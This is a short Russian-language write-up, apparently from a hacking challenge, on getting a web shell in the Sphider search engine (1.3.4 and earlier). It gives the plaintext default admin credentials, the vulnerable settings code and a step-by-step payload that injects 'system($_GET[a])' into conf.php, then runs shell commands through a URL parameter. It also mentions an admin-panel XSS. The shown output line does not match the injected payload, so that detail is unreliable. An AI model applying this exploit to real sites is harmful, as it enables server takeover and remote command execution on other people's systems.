Powered by http://www.sphider.eu/sphider-logo.png (http://www.sphider.eu) <=1.3.4

В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки.

Логин и пасс хранять не в зашифрованом виде в
http://site.com/sphider/admin/auth.php
Дефолт:
error_reporting(E_ERROR | E_PARSE);
$admin = "admin";
$admin_pw = "admin";
Собственно заливка шелла
Уязвимый код:

if ($_index_pdf=="") {
$_index_pdf=0;
}
...
fwrite($fhandle, "\n\n// Index pdf files\n");
fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";");

Удобнее это делать в опере. Идем в сорс и меняем это:

<input name="_index_pdf" type="checkbox" value="0" id="index_pdf" >
на это:
<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >

Сохраняем настройки.
В итоге имеем:

// Index pdf files
$index_pdf = 0; echo($_GET[a]);
http://site.com/sphider/settings/conf.php?a=ls -la

По иронии судьбы на том сайте что в задании прав на запись не хватало.

Также в админке есть xss. Но пользы мало, так как мы уже в админке).